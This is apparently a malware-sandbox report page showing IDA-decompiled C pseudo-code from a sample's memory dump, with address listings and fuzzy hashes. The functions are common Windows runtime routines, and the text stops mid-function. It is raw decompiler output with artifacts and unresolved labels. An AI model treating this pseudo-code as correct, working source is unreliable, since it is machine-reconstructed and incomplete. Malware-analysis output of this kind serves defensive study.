                                                                                                                              0x1d7e19e6
                                                                                                                              0x1d7e193f
                                                                                                                              0x00000000
                                                                                                                              0x1d7e193f
                                                                                                                              0x1d7e1919
                                                                                                                              0x00000000
                                                                                                                              0x1d7e1919
                                                                                                                              0x1d7e18f5
                                                                                                                              0x00000000
                                                                                                                              0x1d7e18d4
                                                                                                                              0x1d7e18d4
                                                                                                                              0x1d7e1a13
                                                                                                                              0x1d7e1a19
                                                                                                                              0x1d7e1a19
                                                                                                                              0x1d7e18d2

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1dfae469ae858e8c9d0516dadbbb0ed0a6e88875ddd7105ede04bdb539c58d3
                                                                                                                              • Instruction ID: 9043ae686e5f634784e63d2f3ac200d4880e240039661d03560a43285ba94a15
                                                                                                                              • Opcode Fuzzy Hash: e1dfae469ae858e8c9d0516dadbbb0ed0a6e88875ddd7105ede04bdb539c58d3
                                                                                                                              • Instruction Fuzzy Hash: BF411671A04286AFDB05DE69E845AFA73B9FF447B4F12816BAD44DB210EB30DD40C792
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74D454 Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E1D74D454(signed int _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t34;
				signed char* _t35;
				signed int _t36;
				signed char* _t37;
				intOrPtr _t39;
				signed int _t44;
				signed int _t46;
				signed int* _t49;
				signed char* _t50;
				signed int _t51;
				signed int _t57;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr* _t86;
				signed int _t88;
				intOrPtr _t90;

				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_t34 =  *( *[fs:0x30] + 0x50);
				if(_t34 != 0) {
					__eflags =  *_t34;
					if(__eflags == 0) {
						goto L1;
					}
					_t35 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t70 = 0x7ffe0384;
					if(( *_t35 & 0x00000001) != 0) {
						_t36 = E1D753C40();
						__eflags = _t36;
						if(_t36 == 0) {
							_t37 = 0x7ffe0384;
						} else {
							_t37 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1D7CFC01(0x1d711bf0,  *_t37 & 0x000000ff);
					}
					_t88 = _a4;
					if(_t88 == 0) {
						L37:
						_t39 = 0xc000000d;
						goto L14;
					} else {
						_t86 = _a8;
						if(_t86 == 0) {
							goto L37;
						}
						if( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)))) != _t88 ||  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) + 4)) != _t86) {
							_v16 = _t88 & 0xfffffffc;
							_t44 = E1D74DE20(0x1d711bf0, __eflags, _t88, 1, 2,  &_v8);
							__eflags = _t44;
							if(_t44 != 0) {
								__eflags = _t86 - _t44;
								if(__eflags < 0) {
									L28:
									_push( &_v12);
									_push(_t86);
									_t46 = E1D7CF615(_t70, _t88, _t86, _t88, __eflags);
									__eflags = _t46;
									if(_t46 != 0) {
										__eflags = _t46 - 0xffffffff;
										if(_t46 != 0xffffffff) {
											_t88 = _t46;
										}
									}
									goto L9;
								}
								_t78 = E1D7CF73D(_t88,  &_v20, __eflags);
								_v8 = _t78;
								__eflags = _t78 - 0xc000007b;
								if(_t78 == 0xc000007b) {
									_t90 = _v8;
									goto L10;
								}
								_t79 = _v20;
								__eflags = _t79;
								if(_t79 == 0) {
									goto L9;
								}
								_t57 = _v16;
								__eflags = _t86 - _t57;
								if(__eflags < 0) {
									goto L28;
								}
								__eflags = _t86 - _t57 + _t79;
								if(__eflags < 0) {
									goto L9;
								}
								goto L28;
							}
							_t90 = 0xc0000089;
							goto L10;
						} else {
							_t88 =  *( *((intOrPtr*)( *[fs:0x18] + 0xfe0)) + 8);
							L9:
							_t90 = E1D74DA30(_t88, _t86, _a12, _a16);
							L10:
							_t49 =  *( *[fs:0x30] + 0x50);
							if(_t49 != 0) {
								__eflags =  *_t49;
								if( *_t49 == 0) {
									goto L11;
								}
								_t50 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								L12:
								if(( *_t50 & 0x00000001) != 0) {
									_t51 = E1D753C40();
									__eflags = _t51;
									if(_t51 != 0) {
										_t70 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E1D7CFC01(0x1d711c00,  *_t70 & 0x000000ff);
								}
								_t39 = _t90;
								L14:
								return _t39;
							}
							L11:
							_t50 = 0x7ffe0385;
							goto L12;
						}
					}
				}
				L1:
				_t35 = 0x7ffe0385;
				goto L2;
			}



























                                                                                                                              0x1d74d465
                                                                                                                              0x1d74d46a
                                                                                                                              0x1d74d470
                                                                                                                              0x1d74d477
                                                                                                                              0x1d7a3cf4
                                                                                                                              0x1d7a3cf7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3d06
                                                                                                                              0x1d74d482
                                                                                                                              0x1d74d485
                                                                                                                              0x1d74d48a
                                                                                                                              0x1d7a3d10
                                                                                                                              0x1d7a3d15
                                                                                                                              0x1d7a3d17
                                                                                                                              0x1d7a3d29
                                                                                                                              0x1d7a3d19
                                                                                                                              0x1d7a3d22
                                                                                                                              0x1d7a3d22
                                                                                                                              0x1d7a3d33
                                                                                                                              0x1d7a3d33
                                                                                                                              0x1d74d490
                                                                                                                              0x1d74d495
                                                                                                                              0x1d7a3e12
                                                                                                                              0x1d7a3e12
                                                                                                                              0x00000000
                                                                                                                              0x1d74d49b
                                                                                                                              0x1d74d49b
                                                                                                                              0x1d74d4a0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74d4b3
                                                                                                                              0x1d7a3d42
                                                                                                                              0x1d7a3d50
                                                                                                                              0x1d7a3d55
                                                                                                                              0x1d7a3d57
                                                                                                                              0x1d7a3d63
                                                                                                                              0x1d7a3d65
                                                                                                                              0x1d7a3d9e
                                                                                                                              0x1d7a3da4
                                                                                                                              0x1d7a3da5
                                                                                                                              0x1d7a3da6
                                                                                                                              0x1d7a3dab
                                                                                                                              0x1d7a3dad
                                                                                                                              0x1d7a3db3
                                                                                                                              0x1d7a3db6
                                                                                                                              0x1d7a3dbc
                                                                                                                              0x1d7a3dbc
                                                                                                                              0x1d7a3db6
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3dad
                                                                                                                              0x1d7a3d72
                                                                                                                              0x1d7a3d74
                                                                                                                              0x1d7a3d78
                                                                                                                              0x1d7a3d7e
                                                                                                                              0x1d7a3dc3
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3dc3
                                                                                                                              0x1d7a3d80
                                                                                                                              0x1d7a3d84
                                                                                                                              0x1d7a3d86
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3d8c
                                                                                                                              0x1d7a3d90
                                                                                                                              0x1d7a3d92
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3d96
                                                                                                                              0x1d7a3d98
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3d98
                                                                                                                              0x1d7a3d59
                                                                                                                              0x00000000
                                                                                                                              0x1d74d4e2
                                                                                                                              0x1d74d4ee
                                                                                                                              0x1d74d4f1
                                                                                                                              0x1d74d500
                                                                                                                              0x1d74d502
                                                                                                                              0x1d74d508
                                                                                                                              0x1d74d50d
                                                                                                                              0x1d7a3dcc
                                                                                                                              0x1d7a3dcf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a3dde
                                                                                                                              0x1d74d518
                                                                                                                              0x1d74d51b
                                                                                                                              0x1d7a3de8
                                                                                                                              0x1d7a3ded
                                                                                                                              0x1d7a3def
                                                                                                                              0x1d7a3dfa
                                                                                                                              0x1d7a3dfa
                                                                                                                              0x1d7a3dfa
                                                                                                                              0x1d7a3e08
                                                                                                                              0x1d7a3e08
                                                                                                                              0x1d74d521
                                                                                                                              0x1d74d523
                                                                                                                              0x1d74d529
                                                                                                                              0x1d74d529
                                                                                                                              0x1d74d513
                                                                                                                              0x1d74d513
                                                                                                                              0x00000000
                                                                                                                              0x1d74d513
                                                                                                                              0x1d74d4b3
                                                                                                                              0x1d74d495
                                                                                                                              0x1d74d47d
                                                                                                                              0x1d74d47d
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cff257fad9abd9ddd24eab4d6326cb9ed98f04dcae62f4005bf733f63f62c4e5
                                                                                                                              • Instruction ID: edd1c44a6f2f5fc28b0bd01bc8c1d7325a0c2de60e770a3d21de34e0ea2d6c1e
                                                                                                                              • Opcode Fuzzy Hash: cff257fad9abd9ddd24eab4d6326cb9ed98f04dcae62f4005bf733f63f62c4e5
                                                                                                                              • Instruction Fuzzy Hash: 37518F31604691CFC712CF5CD444B69B3E5AB40B70F1A86AAE8558B6A1DB74EC40CB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D76D940 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E1D76D940(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v1352;
				signed int _v1356;
				signed int _v1360;
				signed int _v1364;
				intOrPtr _v1372;
				char _v1396;
				signed int _v2748;
				char _v2776;
				char _v2780;
				signed int _v2784;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				signed int _t47;
				signed int _t51;
				void* _t57;
				signed int _t58;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t79;
				signed int _t81;

				_t79 = (_t77 & 0xfffffff8) - 0xadc;
				_v8 =  *0x1d83b370 ^ _t79;
				_t73 = _a4;
				E1D788F40( &_v1396, 0, 0x568);
				E1D788F40( &_v2780, 0, 0x568);
				_t81 = _t79 + 0x18;
				_v2784 = 0;
				if(_t73 == 0) {
					L5:
					_t38 = 0xc000000d;
					L4:
					_pop(_t69);
					_pop(_t74);
					_pop(_t57);
					return E1D784B50(_t38, _t57, _v8 ^ _t81, _t66, _t69, _t74);
				}
				if(_t73 != 0xffffffff || ( *( *[fs:0x30] + 0x68) & 0x00000200) != 0) {
					_push(0);
					_push(0);
					_push(0x1000);
					_push( &_v2784);
					_push(0xffffffff);
					_push(_t73);
					_push(0xffffffff);
					_t75 = E1D782D70();
					__eflags = _t75;
					if(_t75 < 0) {
						L27:
						__eflags = _v2784;
						if(_v2784 != 0) {
							_push(_v2784);
							E1D782A80();
						}
						_t38 = _t75;
						goto L4;
					}
					_t70 =  *( *[fs:0x18] + 0x20);
					_t58 =  *( *[fs:0x18] + 0x24);
					_t76 = E1D7CB3DF(_v2784);
					__eflags = _t70;
					if(_t70 == 0) {
						goto L5;
					}
					__eflags = _t58;
					if(_t58 == 0) {
						goto L5;
					}
					__eflags = _t76;
					if(_t76 == 0) {
						goto L5;
					}
					__eflags = _t70 - _t76;
					if(_t70 == _t76) {
						_t47 =  *( *[fs:0x30] + 0x68);
					} else {
						_t47 = E1D7CB214(_v2784);
					}
					__eflags = _t47 & 0x00000200;
					if((_t47 & 0x00000200) != 0) {
						_v1352 = _a8;
						_v1396 = 0x5680550;
						_v1372 = 0x30000000;
						_v1364 = _t58;
						_v1360 = _t70;
						_v1356 = _t76;
						E1D788F40( &_v2776, 0, 0x564);
						_t81 = _t81 + 0xc;
						_v2780 = 0x5680550;
						_t66 =  &_v2780;
						_t51 = E1D7CAC90( &_v1396,  &_v2780, _t70, __eflags);
						__eflags = _t51;
						if(_t51 >= 0) {
							__eflags = _t51 - 0x102;
							if(_t51 != 0x102) {
								_t71 = _v2748;
								while(1) {
									_push(0);
									_push(1);
									_push(_t71);
									_t75 = E1D7829D0();
									__eflags = _t75 - 0x102;
									if(_t75 == 0x102) {
										break;
									}
									__eflags = _t75;
									if(_t75 < 0) {
										break;
									}
									__eflags = _t75 - 0xc0;
									if(_t75 == 0xc0) {
										continue;
									}
									__eflags = _t75 - 0x101;
									if(_t75 == 0x101) {
										continue;
									}
									_t75 = 0;
									__eflags = 0;
									break;
								}
								__eflags = _t71;
								if(_t71 != 0) {
									_push(_t71);
									E1D782A80();
								}
								goto L27;
							}
							_t75 = 0xc0000240;
							goto L27;
						}
						_t75 = 0xc0000001;
					} else {
						_t75 = 0;
					}
					goto L27;
				} else {
					_t38 = 0;
					goto L4;
				}
			}
































                                                                                                                              0x1d76d948
                                                                                                                              0x1d76d955
                                                                                                                              0x1d76d95e
                                                                                                                              0x1d76d973
                                                                                                                              0x1d76d982
                                                                                                                              0x1d76d987
                                                                                                                              0x1d76d98a
                                                                                                                              0x1d76d990
                                                                                                                              0x1d76d9c7
                                                                                                                              0x1d76d9c7
                                                                                                                              0x1d76d9b0
                                                                                                                              0x1d76d9b7
                                                                                                                              0x1d76d9b8
                                                                                                                              0x1d76d9b9
                                                                                                                              0x1d76d9c4
                                                                                                                              0x1d76d9c4
                                                                                                                              0x1d76d995
                                                                                                                              0x1d7af2b4
                                                                                                                              0x1d7af2b5
                                                                                                                              0x1d7af2b6
                                                                                                                              0x1d7af2bf
                                                                                                                              0x1d7af2c0
                                                                                                                              0x1d7af2c2
                                                                                                                              0x1d7af2c3
                                                                                                                              0x1d7af2ca
                                                                                                                              0x1d7af2cc
                                                                                                                              0x1d7af2ce
                                                                                                                              0x1d7af3df
                                                                                                                              0x1d7af3df
                                                                                                                              0x1d7af3e4
                                                                                                                              0x1d7af3e6
                                                                                                                              0x1d7af3ea
                                                                                                                              0x1d7af3ea
                                                                                                                              0x1d7af3ef
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3ef
                                                                                                                              0x1d7af2da
                                                                                                                              0x1d7af2e7
                                                                                                                              0x1d7af2ef
                                                                                                                              0x1d7af2f1
                                                                                                                              0x1d7af2f3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af2f9
                                                                                                                              0x1d7af2fb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af301
                                                                                                                              0x1d7af303
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af309
                                                                                                                              0x1d7af30b
                                                                                                                              0x1d7af31e
                                                                                                                              0x1d7af30d
                                                                                                                              0x1d7af311
                                                                                                                              0x1d7af311
                                                                                                                              0x1d7af321
                                                                                                                              0x1d7af326
                                                                                                                              0x1d7af337
                                                                                                                              0x1d7af345
                                                                                                                              0x1d7af350
                                                                                                                              0x1d7af35b
                                                                                                                              0x1d7af362
                                                                                                                              0x1d7af369
                                                                                                                              0x1d7af370
                                                                                                                              0x1d7af375
                                                                                                                              0x1d7af378
                                                                                                                              0x1d7af380
                                                                                                                              0x1d7af38b
                                                                                                                              0x1d7af390
                                                                                                                              0x1d7af392
                                                                                                                              0x1d7af3a0
                                                                                                                              0x1d7af3a2
                                                                                                                              0x1d7af3ab
                                                                                                                              0x1d7af3af
                                                                                                                              0x1d7af3af
                                                                                                                              0x1d7af3b1
                                                                                                                              0x1d7af3b3
                                                                                                                              0x1d7af3b9
                                                                                                                              0x1d7af3bb
                                                                                                                              0x1d7af3bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3bf
                                                                                                                              0x1d7af3c1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3c3
                                                                                                                              0x1d7af3c9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3cb
                                                                                                                              0x1d7af3d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3d3
                                                                                                                              0x1d7af3d3
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3d3
                                                                                                                              0x1d7af3d5
                                                                                                                              0x1d7af3d7
                                                                                                                              0x1d7af3d9
                                                                                                                              0x1d7af3da
                                                                                                                              0x1d7af3da
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3d7
                                                                                                                              0x1d7af3a4
                                                                                                                              0x00000000
                                                                                                                              0x1d7af3a4
                                                                                                                              0x1d7af394
                                                                                                                              0x1d7af328
                                                                                                                              0x1d7af328
                                                                                                                              0x1d7af328
                                                                                                                              0x00000000
                                                                                                                              0x1d76d9ae
                                                                                                                              0x1d76d9ae
                                                                                                                              0x00000000
                                                                                                                              0x1d76d9ae

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 89a62cc1348093a6bf67d57e4e6bddd7c7ae4d5fbcbfb9d7ec966b5eb75edf1e
                                                                                                                              • Instruction ID: 3455140c76f0f37a44fefbcfaeed0c9715b6ef968d9c2d92ce5ef49c3b08d3e2
                                                                                                                              • Opcode Fuzzy Hash: 89a62cc1348093a6bf67d57e4e6bddd7c7ae4d5fbcbfb9d7ec966b5eb75edf1e
                                                                                                                              • Instruction Fuzzy Hash: D141D232A097559FD3219A24D8C4B6FB3A8EB84B30F060A6AFD58572D0D674AC44CF93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D737A30 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E1D737A30(signed short* _a4) {
				char _v24;
				intOrPtr _v28;
				void* _v30;
				intOrPtr _v32;
				short _v44;
				void* _v46;
				void* _v48;
				void* _v52;
				void* _v60;
				void* _v72;
				intOrPtr _t34;
				short _t36;
				intOrPtr _t38;
				signed short _t41;
				signed int _t51;
				intOrPtr _t58;
				short _t60;
				intOrPtr _t68;
				intOrPtr _t73;
				signed int _t77;
				short _t78;
				short _t79;
				intOrPtr _t80;
				signed int _t81;
				void* _t83;

				_t34 =  *[fs:0x30];
				_t83 = (_t81 & 0xfffffff8) - 0x1c;
				_t58 =  *((intOrPtr*)(_t34 + 0x18));
				_t73 =  *((intOrPtr*)(_t34 + 0x10));
				if(E1D737B7D(_a4) != 0) {
					_t36 = 0;
					L14:
					return _t36;
				}
				_t62 = _a4;
				if(E1D759370(_a4) != 0) {
					_t36 = 0xc0000103;
				} else {
					_t77 =  *(_t73 + 0x26) & 0x0000ffff;
					while(1) {
						_t38 = E1D755D90(_t62, _t58, 0, _t77);
						_v28 = _t38;
						if(_t38 == 0) {
							break;
						}
						 *((short*)(_t83 + 0x18)) = 0;
						if(_t77 > 0xffff) {
							 *(_t83 + 0x1a) = 0xffff;
							L25:
							_t78 = 0xc0000095;
							L26:
							E1D753BC0(_t58, 0, _t38);
							_t36 = _t78;
							goto L14;
						}
						 *(_t83 + 0x1a) = _t77;
						_t79 = L1D758CE0(_a4, _t77, _t38, 0, 0, _t83 + 0x20);
						if(_t79 == 0) {
							_t78 = 0xc0000033;
							L23:
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L26;
						}
						_t41 =  *(_t83 + 0x1a);
						_t62 = (_t41 & 0x0000ffff) - 4;
						if(_t79 > (_t41 & 0x0000ffff) - 4) {
							__eflags =  *((char*)( *[fs:0x30] + 3));
							if(__eflags >= 0) {
								_t41 =  *(_t83 + 0x1a);
								goto L7;
							}
							E1D753BC0(_t58, 0,  *((intOrPtr*)(_t83 + 0x1c)));
							_t77 = _t79 + 4;
							continue;
						}
						L7:
						_t71 = _t41 & 0x0000ffff;
						if(_t79 > (_t41 & 0x0000ffff)) {
							_t78 = 0xc0000106;
							goto L23;
						}
						_t91 = _t79 - 0xffff;
						if(_t79 > 0xffff) {
							 *((short*)(_t83 + 0x18)) = 0xffff;
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L25;
						}
						 *((short*)(_t83 + 0x18)) = _t79;
						_v32 = E1D7741BB(_t83 + 0x1c, _t71, _t91,  &_v24);
						E1D753BC0(_t58, 0,  *((intOrPtr*)(_t83 + 0x1c)));
						_t60 = _v44;
						if(_t60 >= 0) {
							E1D74FED0(0x1d835b40);
							_t68 = _v28;
							_t80 =  *0x1d836390; // 0x1ab2c38
							_push(0x1d835b40);
							 *((intOrPtr*)(_t73 + 0x2c)) =  *((intOrPtr*)(_t68 + 4));
							 *((intOrPtr*)(_t73 + 0x28)) =  *((intOrPtr*)(_t68 + 0x10));
							 *((short*)(_t73 + 0x24)) =  *((intOrPtr*)(_t68 + 0xc));
							 *0x1d836390 = _t68;
							_t51 = E1D74E740(_t68);
							if(_t80 != 0) {
								asm("lock xadd [esi], eax");
								if((_t51 | 0xffffffff) == 0) {
									_t25 = _t80 + 4; // 0x90
									_push( *_t25);
									E1D782A80();
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t80);
								}
							}
						}
						_t36 = _t60;
						goto L14;
					}
					_t36 = 0xc0000017;
				}
			}




























                                                                                                                              0x1d737a38
                                                                                                                              0x1d737a3e
                                                                                                                              0x1d737a45
                                                                                                                              0x1d737a4a
                                                                                                                              0x1d737a54
                                                                                                                              0x1d737b79
                                                                                                                              0x1d737b70
                                                                                                                              0x1d737b76
                                                                                                                              0x1d737b76
                                                                                                                              0x1d737a5a
                                                                                                                              0x1d737a64
                                                                                                                              0x1d79aef2
                                                                                                                              0x1d737a6a
                                                                                                                              0x1d737a6a
                                                                                                                              0x1d737a6e
                                                                                                                              0x1d737a72
                                                                                                                              0x1d737a77
                                                                                                                              0x1d737a7d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d737a8a
                                                                                                                              0x1d737a91
                                                                                                                              0x1d79af43
                                                                                                                              0x1d79af48
                                                                                                                              0x1d79af48
                                                                                                                              0x1d79af4d
                                                                                                                              0x1d79af51
                                                                                                                              0x1d79af56
                                                                                                                              0x00000000
                                                                                                                              0x1d79af56
                                                                                                                              0x1d737a9b
                                                                                                                              0x1d737ab0
                                                                                                                              0x1d737ab4
                                                                                                                              0x1d79af38
                                                                                                                              0x1d79af3d
                                                                                                                              0x1d79af3d
                                                                                                                              0x00000000
                                                                                                                              0x1d79af3d
                                                                                                                              0x1d737aba
                                                                                                                              0x1d737ac2
                                                                                                                              0x1d737ac7
                                                                                                                              0x1d79af02
                                                                                                                              0x1d79af06
                                                                                                                              0x1d79af1c
                                                                                                                              0x00000000
                                                                                                                              0x1d79af1c
                                                                                                                              0x1d79af0f
                                                                                                                              0x1d79af14
                                                                                                                              0x00000000
                                                                                                                              0x1d79af14
                                                                                                                              0x1d737acd
                                                                                                                              0x1d737acd
                                                                                                                              0x1d737ad2
                                                                                                                              0x1d79af26
                                                                                                                              0x00000000
                                                                                                                              0x1d79af26
                                                                                                                              0x1d737add
                                                                                                                              0x1d737adf
                                                                                                                              0x1d79af2d
                                                                                                                              0x1d79af32
                                                                                                                              0x00000000
                                                                                                                              0x1d79af32
                                                                                                                              0x1d737ae9
                                                                                                                              0x1d737afc
                                                                                                                              0x1d737b03
                                                                                                                              0x1d737b08
                                                                                                                              0x1d737b0e
                                                                                                                              0x1d737b15
                                                                                                                              0x1d737b1a
                                                                                                                              0x1d737b1e
                                                                                                                              0x1d737b24
                                                                                                                              0x1d737b2c
                                                                                                                              0x1d737b32
                                                                                                                              0x1d737b39
                                                                                                                              0x1d737b3d
                                                                                                                              0x1d737b43
                                                                                                                              0x1d737b4a
                                                                                                                              0x1d737b4f
                                                                                                                              0x1d737b53
                                                                                                                              0x1d737b55
                                                                                                                              0x1d737b55
                                                                                                                              0x1d737b58
                                                                                                                              0x1d737b69
                                                                                                                              0x1d737b69
                                                                                                                              0x1d737b53
                                                                                                                              0x1d737b4a
                                                                                                                              0x1d737b6e
                                                                                                                              0x00000000
                                                                                                                              0x1d737b6e
                                                                                                                              0x1d79af5d
                                                                                                                              0x1d79af5d

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ffb735f6d5af4acf79f2ddb902c7017390a852d2b848019632e7e7c1ad9b14aa
                                                                                                                              • Instruction ID: 402e7d5f7548fa9519a69237b18c0e37dc23699bc64ff0c988c52d27199d69a5
                                                                                                                              • Opcode Fuzzy Hash: ffb735f6d5af4acf79f2ddb902c7017390a852d2b848019632e7e7c1ad9b14aa
                                                                                                                              • Instruction Fuzzy Hash: 9D411476508352ABC715DF28D844B6BB7A4FF44670F124829F9599B2A1D720EC01C7D7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D739FD0 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D739FD0(intOrPtr _a4, intOrPtr* _a8, char _a12) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				void* _t31;
				signed int _t35;
				signed short _t37;
				signed int _t38;
				intOrPtr* _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				void* _t48;
				signed int _t49;
				signed short* _t51;
				void* _t52;
				signed short _t54;
				signed int _t55;
				signed int _t56;
				short* _t57;
				intOrPtr _t58;

				_t57 = 0;
				if(_a4 == 0) {
					L34:
					_t58 = 0xc000000d;
					L11:
					if(_t57 != 0) {
						E1D73A093(_t57);
					}
					L13:
					return _t58;
				}
				_t39 = _a8;
				if(_a8 == 0) {
					goto L34;
				}
				_t52 = 8;
				_t31 = 0x2a;
				_t45 = _t31;
				if(E1D73A121(_t31, _t52) == 0) {
					_t58 = 0xc0000095;
					goto L13;
				}
				_t57 = E1D755D90(_t45,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
				if(_t57 == 0) {
					_t58 = 0xc0000017;
					goto L13;
				} else {
					_t35 = 0x2a;
					_t58 = 0;
					if(E1D73A0B8(_t35, _t39, _t57, _a4, 0, 0, _t35) == 0) {
						_t58 = 0xc0000001;
					}
					_t54 = 0;
					_t37 = 0;
					_v12 = 0;
					do {
						if(0 == _t37) {
							goto L8;
						}
						_t49 = _t37;
						_v16 = _t49;
						if( *((intOrPtr*)(_t57 + 4 + _t49 * 8)) != _t54) {
							if(0 >= _t37) {
								goto L8;
							}
							_t41 = _t37 & 0x0000ffff;
							_t13 = _t57 + 2; // 0x2
							_t51 = _t13;
							_t38 = _v16;
							_v8 = _t41;
							do {
								if(_t51[1] != _t54) {
									_t55 =  *(_t51 - 2) & 0x0000ffff;
									if(_t55 != 0) {
										_t43 =  *(_t57 + _t38 * 8) & 0x0000ffff;
										if(_t43 == 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t55 == _t43) {
												_t58 = 0xc0000001;
											}
										}
									}
									_t56 =  *_t51 & 0x0000ffff;
									if(_t56 > 0) {
										_t42 =  *(_t57 + 2 + _t38 * 8) & 0x0000ffff;
										if(_t42 <= 0) {
											_t41 = _v8;
										} else {
											_t41 = _v8;
											if(_t56 == _t42) {
												_t58 = 0xc0000001;
											}
										}
									}
									_t54 = 0;
								}
								_t51 =  &(_t51[4]);
